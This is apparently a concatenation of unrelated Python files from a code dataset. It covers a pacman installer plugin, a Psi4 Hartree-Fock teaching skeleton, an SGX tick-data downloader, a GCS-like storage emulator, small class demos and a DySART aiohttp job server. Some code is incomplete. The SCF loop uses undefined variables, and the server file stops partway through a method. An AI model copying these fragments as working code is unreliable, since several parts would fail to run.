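# Illustrative usage sketch (tensor sizes and layer weights are assumptions; shown
# as comments because this module is designed to be imported through mmedit and
# the first call downloads the torchvision VGG19 weights):
#
#   loss_fn = PerceptualLoss(layer_weights={'4': 1.0, '9': 1.0, '18': 1.0})
#   pred = torch.rand(1, 3, 64, 64) * 2 - 1    # fake prediction in [-1, 1]
#   target = torch.rand(1, 3, 64, 64) * 2 - 1  # fake ground truth in [-1, 1]
#   percep_loss, style_loss = loss_fn(pred, target)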
| StarcoderdataPython |
193823 | <gh_stars>10-100
# Copyright (c) 2009, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author <NAME>/<EMAIL>
import subprocess
from rospkg.os_detect import OS_ARCH
from ..installers import PackageManagerInstaller
from .source import SOURCE_INSTALLER
PACMAN_INSTALLER = 'pacman'
def register_installers(context):
context.set_installer(PACMAN_INSTALLER, PacmanInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_ARCH, SOURCE_INSTALLER)
context.add_os_installer_key(OS_ARCH, PACMAN_INSTALLER)
context.set_default_os_installer_key(OS_ARCH, lambda self: PACMAN_INSTALLER)
def pacman_detect_single(p):
return not subprocess.call(['pacman', '-T', p], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def pacman_detect(packages):
return [p for p in packages if pacman_detect_single(p)]
class PacmanInstaller(PackageManagerInstaller):
def __init__(self):
super(PacmanInstaller, self).__init__(pacman_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
command = ['pacman', '-S']
if not interactive:
command.append('--noconfirm')
if not reinstall:
command.append('--needed')
if quiet:
command.append('-q')
return [self.elevate_priv(command + packages)]
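# Illustrative sketch (package names are assumptions; requires an Arch host with
# pacman and the rosdep package context, so shown as comments only):
#
#   installer = PacmanInstaller()
#   print(installer.get_install_command(['bash', 'tinyxml'], interactive=False))
#   print(pacman_detect(['bash', 'no-such-package']))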
| StarcoderdataPython |
4826054 | #!/usr/bin/python3
"""
Demonstrates the use of Psi4 from Python level.
Useful notes:
o Use psi4.core module for most of the work
o Useful modules within psi4.core:
- MintsHelper
- Molecule
- BasisSet
- ExternalPotential
others
o Psi4 defines its own matrix type (psi4.core.Matrix).
Extracting numpy.array is easy:
numpy_array = numpy.asarray(psi4_matrix)
Creating Psi4 matrix from array is also easy:
psi4_matrix = psi4.core.Matrix.from_array(numpy_array)
o To compute 1-el potential matrix for a set of charges
use ExternalPotential (charge positions are to be provided in Angstroms)
unless charges are just nuclei within the basis set (in this case use of ao_potential method
of MintsHelper is easier).
o ao_potential method of MintsHelper is limited only for nuclei within the same basis set
(the nuclei are taken from the first basis set axis, for example:
mints = MintsHelper(basis_X)
mints.ao_potential() -> nuclei taken from basis of mints object (basis_X)
mints.ao_potential(basis_1, basis_2) -> nuclei taken from basis_1
o Psi4 has efficient and easy to use method of defining fragments within a molecule (use '--' separator).
   Defining ghost atoms and extracting fragment i in the multimer-centred basis set is also very straightforward
(method extract_subsets(...) of psi4.core.Molecule)
---
<NAME>
"""
import psi4
import numpy
MAX_NBF = 128
class SCF:
"""
---------------------------------------------------------------------------------------------------------------
Self-Consistent Field (SCF) Procedure for Hartree-Fock Model
---------------------------------------------------------------------------------------------------------------
Demo for RHF-SCF method (closed shells). Implements SCF algorithm
with primitive damping of the AO Fock matrix.
Usage:
scf = SCF(molecule)
scf.run(maxit=30, conv=1.0e-7, guess=None, damp=0.01, ndamp=10, verbose=True)
The above example runs SCF on 'molecule' psi4.core.Molecule object
starting from core Hamiltonian as guess (guess=None)
and convergence 1.0E-7 A.U. in total energy with 30 maximum iterations
(10 of which are performed by damping of the Fock matrix with damping coefficient of 0.01).
The SCF iterations are printed to standard output (verbose=True).
---------------------------------------------------------------------------------------------------------------
Last Revision: Gundelfingen, May 4th 2018
"""
def __init__(self, mol):
"Initialize BasisSet, Wavefunction and JK objects"
        # NOTE: the assignments below are one possible completion of the original
        # empty TODO stubs, using the Psi4 API referenced in the module docstring.
        # Wavefunction (built from the globally selected basis set)
        self._wfn = psi4.core.Wavefunction.build(mol, psi4.core.get_global_option('BASIS'))
        # Basis set
        self._bfs = self._wfn.basisset()
        # Number of alpha electrons
        self._ndocc = self._wfn.nalpha()
        # Integral calculator
        self._mints = psi4.core.MintsHelper(self._bfs)
        # JK object
        self._jk = psi4.core.JK.build(self._bfs)
        self._jk.initialize()
### Accessors
# nuclear repulsion energy
        self.e_nuc = mol.nuclear_repulsion_energy()
# Total Energy
self.E = None
# Density Matrix
self.D = None
# LCAO-MO coeffs (occ)
self.Co= None
# LCAO-MO coeffs (occ+vir)
self.C = None
# Fock matrix
self.F = None
# Orbital energies
self.eps = None
# Hcore matrix
self.H = None
# Overlap integrals and orthogonalizer
        self.S = numpy.asarray(self._mints.ao_overlap())
self.X = self._orthogonalizer(self.S)
return
def run(self, maxit=30, conv=1.0e-7, guess=None, damp=0.01, ndamp=10, verbose=True):#TODO
"Solve SCF (public interface)"
if guess is None:
            # Form Hcore = T + V from the kinetic and potential AO integrals
            H = numpy.asarray(self._mints.ao_kinetic()) + numpy.asarray(self._mints.ao_potential())
else: H = numpy.asarray(guess)
self.H = H.copy()
self._run(H, maxit, conv, damp, ndamp, verbose)
return
# --- protected --- #
def _run(self, H, maxit, conv, damp, ndamp, verbose):#TODO
"Solve SCF (protected interface)"
# [1] Guess density matrix
# [2] Start iteration cycles
while (abs(e_old - e_new) > conv):
niter += 1
# [3] form Fock matrix
# [4] compute total energy
if verbose:
print (" @SCF Iter {:02} E = {:14.8f}".format(niter, e_new))
# [5] transform Fock matrix to orthogonal AO basis
# [6] diagonalize the Fock matrix
# [7] convert LCAO-MO coefficiets to non-orthogonal AO basis
# [8] form density matrix
# [9] save current data
if niter > maxit: break
return
    def _orthogonalizer(self, S):
        "Form the symmetric orthogonalizer X = S^(-1/2) (one possible completion of the TODO)"
        eigval, eigvec = numpy.linalg.eigh(numpy.asarray(S))
        return eigvec @ numpy.diag(1.0 / numpy.sqrt(eigval)) @ eigvec.T
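# Illustrative driver (not part of the original exercise). The geometry, basis and
# thresholds below are arbitrary assumptions showing how the class is meant to be
# called; meaningful energies require the remaining TODOs in _run to be completed.
if __name__ == '__main__':
    psi4.set_options({'basis': 'sto-3g', 'scf_type': 'pk'})
    water = psi4.geometry("""
    0 1
    O
    H 1 0.96
    H 1 0.96 2 104.5
    """)
    scf = SCF(water)
    scf.run(maxit=30, conv=1.0e-7, verbose=True)
    print("Final SCF energy:", scf.E)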
| StarcoderdataPython |
1772990 | <filename>console/helper/formatter_helper.py
# -*- coding: utf-8 -*-
from helper import Helper
from ..formatter.output_formatter import OutputFormatter
class FormatterHelper(Helper):
def format_section(self, section, message, style='info'):
return '<%s>[%s]</%s> %s' % (style, section, style, message)
def format_block(self, messages, style, large=False):
messages = [messages] if not isinstance(messages, (list, tuple)) else messages
l = 0
lines = []
for message in messages:
message = OutputFormatter.escape(message)
            lines.append(('  %s  ' if large else ' %s ') % message)
l = max(len(message) + (4 if large else 2), l)
        messages = [' ' * l] if large else []
for line in lines:
messages.append(line + ' ' * (l - len(line)))
if large:
messages.append(' ' * l)
        messages = ['<%s>%s</%s>' % (style, message, style) for message in messages]
return '\n'.join(messages)
def get_name(self):
return 'formatter'
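# Illustrative usage sketch (section/style names and messages are assumptions;
# shown as comments because this module relies on relative package imports):
#
#   helper = FormatterHelper()
#   print(helper.format_section('cli', 'Starting up'))
#   print(helper.format_block(['Error!', 'Something went wrong'], 'error', large=True))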
| StarcoderdataPython |
3366408 | # Look at the tick data for October and then using file 07
import os
import time
import pandas as pd
import requests, zipfile, io
# Doing 4500 to 4700 (4500-4699 inclusive)
# for num in range(4400, 4500):
# for num in range(4300, 4400):
def main():
num_hvnt_worked = list()
print("Downloading data...")
for num in range(4700, 4750):
try:
print(f"Downloading zip no. {num} is in progress")
download_zip(f"https://links.sgx.com/1.0.0/derivatives-historical/{num}/WEBPXTICK_DT.zip")
print(f"Zip {num} has been downloaded")
except Exception as e:
print(f"This is the exception that has occured for {num}: \n{e}")
num_hvnt_worked.append(num)
print("Parsing through required data...")
parser()
print(num_hvnt_worked)
def parser(thumb_drive_directory="/Volumes/TICK/tick_info"):
thumb_drive_list = os.listdir(thumb_drive_directory)
index = 0
for paths in thumb_drive_list:
index += 1
# Reading in the relevant information from the big file
df = pd.read_csv(f"{thumb_drive_directory}/{paths}")
# Converting the relevant information into a csv file
date = str(paths)
date = paths.split('.')[0]
date = date.split('-')[1]
df = df.loc[(df['Comm'] == "TF")] # Only require TF right now
df.to_csv(f"/Volumes/TICK/required_info/info{date}.csv", index=False)
print(f"Index has been made with Filename /Volumes/TICK/required_info/info{date}.csv")
os.remove(f"{thumb_drive_directory}/{paths}") # Delete the big zip file collected
print(f"{thumb_drive_directory}/{paths} has been removed")
print(f"Total files deleted: {index}")
def download_zip(zip_file_url):
"""
Takes a single argument: the zip url that we require
Stores the downloaded zip file in the usb/thumb_drive_directory
"""
try:
r = requests.get(zip_file_url, stream=True)
print("r")
z = zipfile.ZipFile(io.BytesIO(r.content))
print("z")
z.extractall("/Volumes/TICK/tick_info")
print("ze")
print("We are gonna take a break before going for the next one")
time.sleep(10)
except requests.exceptions.ConnectionError:
r.status_code = "Connection refused"
print("ConnectionError")
time.sleep(10)
if __name__ == "__main__":
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
| StarcoderdataPython |
168851 | # (C) Copyright 2018-2021 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
"""
Example of a custom background job type.
"""
from traits.api import (
Bool,
Button,
HasStrictTraits,
Instance,
observe,
Property,
Str,
)
from traits_futures.api import TraitsExecutor
from traitsui.api import HGroup, UItem, View
from fizz_buzz_task import FizzBuzzFuture, submit_fizz_buzz
class FizzBuzzUI(HasStrictTraits):
#: The executor to submit tasks to.
traits_executor = Instance(TraitsExecutor)
#: The future object returned on task submission.
future = Instance(FizzBuzzFuture)
#: Status message showing current state or the last-received result.
message = Str("Ready")
#: Button to calculate, plus its enabled state.
calculate = Button()
can_calculate = Property(Bool(), observe="future")
#: Button to cancel, plus its enabled state.
cancel = Button()
can_cancel = Property(Bool(), observe="future.cancellable")
@observe("calculate")
def _submit_calculation(self, event):
self.message = "Running"
self.future = submit_fizz_buzz(self.traits_executor)
@observe("cancel")
def _cancel_running_task(self, event):
self.message = "Cancelling"
self.future.cancel()
@observe("future:fizz")
def _report_fizz(self, event):
self.message = "Fizz {}".format(event.new)
@observe("future:buzz")
def _report_buzz(self, event):
self.message = "Buzz {}".format(event.new)
@observe("future:fizz_buzz")
def _report_fizz_buzz(self, event):
self.message = "FIZZ BUZZ! {}".format(event.new)
@observe("future:done")
def _reset_future(self, event):
self.message = "Ready"
self.future = None
def _get_can_calculate(self):
return self.future is None
def _get_can_cancel(self):
return self.future is not None and self.future.cancellable
traits_view = View(
UItem("message", style="readonly"),
HGroup(
UItem("calculate", enabled_when="can_calculate"),
UItem("cancel", enabled_when="can_cancel"),
),
resizable=True,
)
if __name__ == "__main__":
traits_executor = TraitsExecutor()
try:
FizzBuzzUI(traits_executor=traits_executor).configure_traits()
finally:
traits_executor.shutdown()
| StarcoderdataPython |
3364514 | <reponame>pylangstudy/201706
try:
print('try')
raise Exception
except Exception as e:
print('except')
finally:
print('finally')
| StarcoderdataPython |
3284790 | import datetime
import json
import logging
import os
import fs
from fs.errors import FileExpected, ResourceNotFound
from .exceptions import Conflict, NotFound
from .settings import STORAGE_BASE, STORAGE_DIR
logger = logging.getLogger(__name__)
class Storage(object):
def __init__(self, use_memory_fs=False, data_dir=STORAGE_BASE):
if not os.path.isabs(data_dir):
raise ValueError("data_dir must be an absolute path")
self._use_memory_fs = use_memory_fs
self._data_dir = data_dir
self._pwd = fs.open_fs(data_dir)
try:
self._fs = self._pwd.makedir(STORAGE_DIR)
except fs.errors.DirectoryExists:
self._fs = self._pwd.opendir(STORAGE_DIR)
self._read_config_from_file()
def _write_config_to_file(self):
data = {
"buckets": self.buckets,
"objects": self.objects,
"resumable": self.resumable,
}
with self._fs.open(".meta", mode="w") as meta:
json.dump(data, meta, indent=2)
def _read_config_from_file(self):
try:
with self._fs.open(".meta", mode="r") as meta:
data = json.load(meta)
self.buckets = data.get("buckets")
self.objects = data.get("objects")
self.resumable = data.get("resumable")
except ResourceNotFound:
self.buckets = {}
self.objects = {}
self.resumable = {}
def _get_or_create_dir(self, bucket_name, file_name):
try:
bucket_dir = self._fs.makedir(bucket_name)
except fs.errors.DirectoryExists:
bucket_dir = self._fs.opendir(bucket_name)
dir_name = fs.path.dirname(file_name)
return bucket_dir.makedirs(dir_name, recreate=True)
def get_storage_base(self):
"""Returns the pyfilesystem-compatible fs path to the storage
This is the OSFS if using disk storage, or "mem://" otherwise.
See https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems for more info
Returns:
            string -- The relevant filesystem
"""
if self._use_memory_fs:
return "mem://"
else:
return self._data_dir
def get_bucket(self, bucket_name):
"""Get the bucket resourec object given the bucket name
Arguments:
bucket_name {str} -- Name of the bucket
Returns:
dict -- GCS-like Bucket resource
"""
return self.buckets.get(bucket_name)
def get_file_list(self, bucket_name, prefix=None, delimiter=None):
"""Lists all the blobs in the bucket that begin with the prefix.
This can be used to list all blobs in a "folder", e.g. "public/".
The delimiter argument can be used to restrict the results to only the
"files" in the given "folder". Without the delimiter, the entire tree under
the prefix is returned. For example, given these blobs:
a/1.txt
a/b/2.txt
If you just specify prefix = 'a', you'll get back:
a/1.txt
a/b/2.txt
However, if you specify prefix='a' and delimiter='/', you'll get back:
a/1.txt
Additionally, the same request will return blobs.prefixes populated with:
a/b/
Source: https://cloud.google.com/storage/docs/listing-objects#storage-list-objects-python
"""
if bucket_name not in self.buckets:
raise NotFound
bucket_objects = self.objects.get(bucket_name, {})
if prefix:
# TODO: Still need to implement the last part of the doc string above to
# TODO: populate blobs.prefixes when using a delimiter.
return list(file_object for file_name, file_object in bucket_objects.items()
if file_name.startswith(prefix)
and (not delimiter or delimiter not in file_name[len(prefix+delimiter):]))
else:
return list(bucket_objects.values())
def create_bucket(self, bucket_name, bucket_obj):
"""Create a bucket object representation and save it to the current fs
Arguments:
bucket_name {str} -- Name of the GCS bucket
bucket_obj {dict} -- GCS-like Bucket resource
Returns:
            dict -- The bucket resource that was stored
"""
self.buckets[bucket_name] = bucket_obj
self._write_config_to_file()
return bucket_obj
def create_file(self, bucket_name, file_name, content, file_obj):
"""Create a text file given a string content
Arguments:
bucket_name {str} -- Name of the bucket to save to
file_name {str} -- File name used to store data
content {bytes} -- Content of the file to write
file_obj {dict} -- GCS-like Object resource
"""
file_dir = self._get_or_create_dir(bucket_name, file_name)
base_name = fs.path.basename(file_name)
with file_dir.open(base_name, mode="wb") as file:
file.write(content)
bucket_objects = self.objects.get(bucket_name, {})
bucket_objects[file_name] = file_obj
self.objects[bucket_name] = bucket_objects
self._write_config_to_file()
def create_resumable_upload(self, bucket_name, file_name, file_obj):
"""Initiate the necessary data to support partial upload.
This doesn't fully support partial upload, but expect the secondary PUT
call to send all the data in one go.
Basically, we try to comply to the bare minimum to the API described in
https://cloud.google.com/storage/docs/performing-resumable-uploads ignoring
any potential network failures
Arguments:
bucket_name {string} -- Name of the bucket to save to
file_name {string} -- File name used to store data
file_obj {dict} -- GCS Object resource
Returns:
str -- id of the resumable upload session (`upload_id`)
"""
file_id = "{}:{}:{}".format(bucket_name, file_name, datetime.datetime.now())
self.resumable[file_id] = file_obj
self._write_config_to_file()
return file_id
def create_file_for_resumable_upload(self, file_id, content):
"""Create a binary file following a partial upload request
This also updates the meta with the final file-size
Arguments:
file_id {str} -- the `upload_id` of the partial upload session
content {bytes} -- raw content to add to the file
Returns:
dict -- GCS-like Object resource
"""
file_obj = self.resumable[file_id]
bucket_name = file_obj["bucket"]
file_name = file_obj["name"]
file_dir = self._get_or_create_dir(bucket_name, file_name)
base_name = fs.path.basename(file_name)
with file_dir.open(base_name, mode="wb") as file:
file.write(content)
file_obj["size"] = str(len(content))
bucket_objects = self.objects.get(bucket_name, {})
bucket_objects[file_name] = file_obj
self.objects[bucket_name] = bucket_objects
del self.resumable[file_id]
self._write_config_to_file()
return file_obj
def get_file_obj(self, bucket_name, file_name):
"""Gets the meta information for a file within a bucket
Arguments:
bucket_name {str} -- Name of the bucket
file_name {str} -- File name
Raises:
NotFound: Raised when the object doesn't exist
Returns:
dict -- GCS-like Object resource
"""
try:
return self.objects[bucket_name][file_name]
except KeyError:
raise NotFound
def get_file(self, bucket_name, file_name):
"""Get the raw data of a file within a bucket
Arguments:
bucket_name {str} -- Name of the bucket
file_name {str} -- File name
Raises:
NotFound: Raised when the object doesn't exist
Returns:
bytes -- Raw content of the file
"""
try:
bucket_dir = self._fs.opendir(bucket_name)
return bucket_dir.open(file_name, mode="rb").read()
except (FileExpected, ResourceNotFound) as e:
logger.error("Resource not found:")
logger.error(e)
raise NotFound
def delete_bucket(self, bucket_name):
"""Delete a bucket's meta and file
Arguments:
bucket_name {str} -- GCS bucket name
Raises:
NotFound: If the bucket doesn't exist
Conflict: If the bucket is not empty or there are pending uploads
"""
bucket_meta = self.buckets.get(bucket_name)
if bucket_meta is None:
raise NotFound("Bucket with name '{}' does not exist".format(bucket_name))
bucket_objects = self.objects.get(bucket_name, {})
if len(bucket_objects.keys()) != 0:
raise Conflict("Bucket '{}' is not empty".format(bucket_name))
resumable_ids = [
file_id
for (file_id, file_obj) in self.resumable.items()
if file_obj.get('bucket') == bucket_name
]
if len(resumable_ids) != 0:
raise Conflict("Bucket '{}' has pending upload sessions".format(bucket_name))
del self.buckets[bucket_name]
self._delete_dir(bucket_name)
self._write_config_to_file()
def delete_file(self, bucket_name, file_name):
try:
self.objects[bucket_name][file_name]
except KeyError:
raise NotFound("Object with name '{}' does not exist in bucket '{}'".format(bucket_name, file_name))
del self.objects[bucket_name][file_name]
self._delete_file(bucket_name, file_name)
self._write_config_to_file()
def _delete_file(self, bucket_name, file_name):
try:
with self._fs.opendir(bucket_name) as bucket_dir:
bucket_dir.remove(file_name)
except ResourceNotFound:
logger.info("No file to remove '{}/{}'".format(bucket_name, file_name))
def _delete_dir(self, path, force=True):
try:
remover = self._fs.removetree if force else self._fs.removedir
remover(path)
except ResourceNotFound:
logger.info("No folder to remove '{}'".format(path))
def wipe(self, keep_buckets=False):
existing_buckets = self.buckets
self.buckets = {}
self.objects = {}
self.resumable = {}
try:
self._fs.remove('.meta')
for path in self._fs.listdir('.'):
self._fs.removetree(path)
except ResourceNotFound as e:
logger.warning(e)
if keep_buckets:
for k, v in existing_buckets.items():
self.create_bucket(k, v)
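# Illustrative usage sketch (bucket/object names and resource dicts are assumptions;
# shown as comments because this module uses relative imports and is meant to be
# used as part of the package):
#
#   storage = Storage()
#   storage.create_bucket('demo-bucket', {'name': 'demo-bucket'})
#   storage.create_file('demo-bucket', 'a/1.txt', b'hello',
#                       {'name': 'a/1.txt', 'bucket': 'demo-bucket', 'size': '5'})
#   print(storage.get_file_list('demo-bucket', prefix='a', delimiter='/'))
#   print(storage.get_file('demo-bucket', 'a/1.txt'))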
| StarcoderdataPython |
4804006 | """
Copyright (c) 2020, <NAME>.
Distributed under the terms of the MIT License.
The full license is in the file LICENSE, distributed with this software.
Created on Feb 21, 2020
@author
"""
class User:
a_pay = 15000 # class variables.
b_pay = 21000
def __init__(self, value):
self.list = []
self.dict = {}
self.pay = 500
self.value = value
def modifying(self, *args, **kwargs):
self.list = list(args) # updating 'self.list'.
for i, j in kwargs.items():
print(i, j, end='\n')
self.dict = kwargs # updating 'self.dict'.
return self.list, self.dict
def __str__(self): # so 'str(self)' can now be applied.
return f'The list is: {self.list} and the dictionary is: {self.dict}.'
# returns the updated 'self.list' and 'self.dict'.
@classmethod
def modvar_class(cls, c_pay): # it is responsible for operating
# class variables.
tol_var = (cls.a_pay + cls.b_pay + c_pay)
return f"Total value of their pays: {tol_var}."
@classmethod
def calling_class(cls, another_value): # its job is to pass its argument
# to the class itself.
return cls(another_value)
@staticmethod
def pass_func(*args): # it does't have any relation to
# object instance or class instance.
return sum(args)
u1 = User(500) # '500' sets as the value of 'self.value', where 'u1'='self'.
print(u1) # it prints all dunders inside
print(u1.value)
print(u1.modifying(10, 40, my_name='Souvik', language='Python'))
print(u1) # after modifying it prints dunder...
print(User.modvar_class(16000))
u2 = u1.calling_class(1000) # '500' is overwritten by '1000' here.
print(u2.value) # overwritten value of 'self.value'.
u3 = User.calling_class(2000) # it passes its argument and newly sets 'self.value'.
print(u3.value) # then, it prints the updated 'self.value'.
print(User.pass_func(10, 20, 30))
## can also be written as....
print(u2.pass_func(40, 50, 60))
print(str(u1)) # it works as __str__() defined in the class
print(u1.__str__()) # same condition as above..
## otherwise, 'it raises AttributeError' if '__str__()' was not defined.
print(User.__str__(u1)) # also applicable.
print(u2.modifying(20, 30, name='<NAME>', role='Python Creator'))
print(u2)
print(str(u2))
print(u2.__str__())
print(User.__str__(u2))
| StarcoderdataPython |
3228161 | import csv
class MTTFCalculator:
def __init__(self):
self.failures = []
self.read_from_file()
def calculate_mttf(self):
        # Compute the mean of the values stored in "failures" and return the result
        # (completed exercise; returns 0 if no failure times have been recorded yet).
        if not self.failures:
            return 0
        return sum(self.failures) / len(self.failures)
def write_to_file(self):
"""Hier wird die failures Liste in eine CSV Datei geschrieben"""
logfile = open("logfile.csv", 'w', newline='')
wr = csv.writer(logfile,dialect=csv.excel)
wr.writerows([list(range(1,len(self.failures)+1)), self.failures])
def read_from_file(self):
"""Hier wird zu beginn geschaut, ob es eine logfile gibt.
Wenn ja, wird diese ausgelesen und die Werte in failures gespeichert"""
try:
logfile = open ("logfile.csv", "r")
rows = list(csv.reader(logfile, dialect=csv.excel))
if(len(rows)>1):
for entry in rows[1]:
self.failures.append(int(entry))
except:
print("No Logfile Found") | StarcoderdataPython |
1723729 | # -*- coding: utf-8 -*-
"""
Author: mcncm 2019
DySART job server
currently using http library; this should not be used in production, as it's
not really a secure solution with sensible defaults. Should migrate to Apache
or Nginx as soon as I understand what I really want.
Why am I doing this?
* Allows multiple clients to request jobs
* Allows new _kinds_ of clients, like "cron" services and web clients (which
Simon is now asking about)
* Keeps coupling weakish between user and database; probably a good strategy.
TODO
* loggin'
* login
* when the scheduler is shut down, it should die gracefully: preferably dump its
job queue to a backup file on the database, and recover from this on startup.
Still-open question: how is the request formulated? I imagine that it's basically
python code that the server evaluates. But this is literally the most insecure
thing you can do. So, it needs to be a very restricted subset. Ideally, it would
be sort of good if you're only allowed to call methods on features and have some
value returned.
"""
import functools
from io import StringIO
import json
import pickle
import sys
from dysart.feature import exposed, CallRecord
from dysart.records import RequestRecord
import dysart.messages.messages as messages
from dysart.messages.errors import *
import dysart.project as project
import dysart.services.service as service
from dysart.services.database import Database
import toplevel.conf as conf
import aiohttp.web as web
import mongoengine as me
# TEMPORARY
from dysart.equs_std.equs_features import *
def process_request(coro):
"""Wraps a session handler coroutine to perform authentication; also
injects internal request type.
Args:
coro: A coroutine function, notionally an HTTP request handler.
Returns:
A coroutine function, notionally an HTTP request handler.
Todo:
Need to figure out how to unwrap the response to persist its body
in the RequestRecord
"""
@functools.wraps(coro)
async def wrapped(self, request):
await self.authorize(request)
text = await request.text()
request = RequestRecord(
remote=request.remote,
path=request.path,
text=text
)
return await coro(self, request)
return wrapped
class Dyserver(service.Service):
def __init__(self, start_db=False):
"""Start and connect to standard services
"""
self.host = conf.config['server_host']
self.port = int(conf.config['server_port'])
self.db_host = conf.config['db_host']
self.db_port = conf.config['db_port']
self.labber_host = conf.config['labber_host']
self.logfile = os.path.join(
conf.dys_path,
conf.config['logfile_name']
)
if start_db or 'start_db' in conf.config['options']:
self.db_server = Database('database')
self.db_server.start()
self.app = web.Application()
self.setup_routes()
# TODO marked for deletion
def is_running(self) -> bool:
return hasattr(self, 'httpd')
def _start(self) -> None:
"""Connects to services and runs the server continuously"""
self.db_connect(self.db_host, self.db_port)
self.labber_connect(self.labber_host)
web.run_app(self.app, host=self.host, port=self.port)
if hasattr(self, 'db_server'):
self.db_server.stop()
def _stop(self) -> None:
"""Ends the server process"""
if hasattr(self, 'db_server'):
self.db_server.stop()
def db_connect(self, host_name, host_port) -> None:
"""Sets up database client for python interpreter.
"""
with messages.StatusMessage('{}connecting to database...'.format(messages.TAB)):
try:
self.db_client = me.connect(conf.config['default_db'], host=host_name, port=host_port)
# Do the following lines do anything? I actually don't know.
sys.path.pop(0)
sys.path.insert(0, os.getcwd())
except Exception as e: # TODO
self.db_client = None
raise ConnectionError
def labber_connect(self, host_name) -> None:
"""Sets a labber client to the default instrument server.
"""
with messages.StatusMessage('{}Connecting to instrument server...'.format(messages.TAB)):
try:
with LabberContext():
labber_client = Labber.connectToServer(host_name)
# Pokemon exception handling generally frowned upon, but I'm not
# sure how to catch both a ConnectionError and an SG_Network.Error.
except ConnectionError as e:
labber_client = None
raise ConnectionError
finally:
self.labber_client = labber_client
def job_scheduler_connect(self) -> None:
self.job_scheduler = jobscheduler.JobScheduler()
self.job_scheduler.start()
def load_project(self, project_path: str):
"""Loads a project into memory, erasing a previous project if it
existed.
"""
self.project = project.Project(project_path)
async def authorize(self, request):
"""Auth for an incoming HTTP request. In the future this will probably
do some more elaborate three-way handshake; for now, it simply checks
the incoming IP address against a whitelist.
Args:
request:
Raises:
web.HTTPUnauthorized
"""
if request.remote not in conf.config['whitelist']:
raise web.HTTPUnauthorized
async def refresh_feature(self, feature, request: RequestRecord):
"""
Args:
feature: the feature to be refreshed
Todo:
Schedule causally-independent features to be refreshed
concurrently. This should just execute them serially.
At some point in the near future, I'd like to implement
a nice concurrent graph algorithm that lets the server
keep multiple refreshes in flight at once.
"""
scheduled_features = await feature.expired_ancestors()
for scheduled_feature in scheduled_features:
record = CallRecord(scheduled_feature, request)
await scheduled_feature.exec_feature(record)
@process_request
async def feature_get_handler(self, request: RequestRecord):
"""Handles requests that only retrieve data about Features.
For now, it simply retrieves the values of all `refresh`
methods attached to the Feature.
Args:
request:
Returns: A json object with the format,
{
'name': name,
'id': id,
'results': {
row_1: val_1,
...
row_n: val_n
}
}
"""
data = request.json
try:
feature_id = self.project.feature_ids[data['feature']]
feature = self.project.features[feature_id]
except KeyError:
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} not found"
)
response_data = feature._repr_dict_()
response_data['name'] = data['feature']
return web.Response(body=json.dumps(response_data))
@process_request
async def feature_post_handler(self, request: RequestRecord):
"""Handles requests that may mutate state.
Args:
request: request data is expected to have the fields,
`project`, `feature`, `method`, `args`, and `kwargs`.
Returns:
"""
data = request.json
# Rolling my own remote object protocol...
try:
feature_id = self.project.feature_ids[data['feature']]
feature = self.project.features[feature_id]
except KeyError:
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} not found"
)
method = getattr(feature, data['method'], None)
if not isinstance(method, exposed):
# This exception will be raised if there is no such method *or* if
# the method is unexposed.
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} has no method {data['method']}"
)
if hasattr(method, 'is_refresh'):
await self.refresh_feature(feature, request)
print(f"Calling method `{data['method']}` of feature `{data['feature']}`")
return_value = method(*data['args'], **data['kwargs'])
return web.Response(body=pickle.dumps(return_value))
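
    # Hedged example of the JSON body this handler expects; the project, feature
    # and method names below are illustrative, not taken from a real project:
    #   {"project": "demo", "feature": "resonator_fit", "method": "fit",
    #    "args": [], "kwargs": {}}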
@process_request
async def project_post_handler(self, request: RequestRecord):
"""Handles project management-related requests. For now,
this just loads/reloads the sole project in server memory.
Args:
request: request data is expected to have the field,
`project`.
Returns:
"""
data = request.json
def exposed_method_names(feature_id: str):
return [m.__name__ for m in
self.project.features[feature_id].exposed_methods()]
try:
print(f"Loading project `{data['project']}`")
self.load_project(conf.config['projects'][data['project']])
proj = self.project
graph = proj.feature_graph()
body = {
'graph': graph,
'features': {
name: exposed_method_names(feature_id)
for name, feature_id in proj.feature_ids.items()
}
}
response = web.Response(body=json.dumps(body))
except KeyError:
response = web.HTTPNotFound(
reason=f"Project {data['project']} not found"
)
return response
@process_request
async def debug_handler(self, request: RequestRecord):
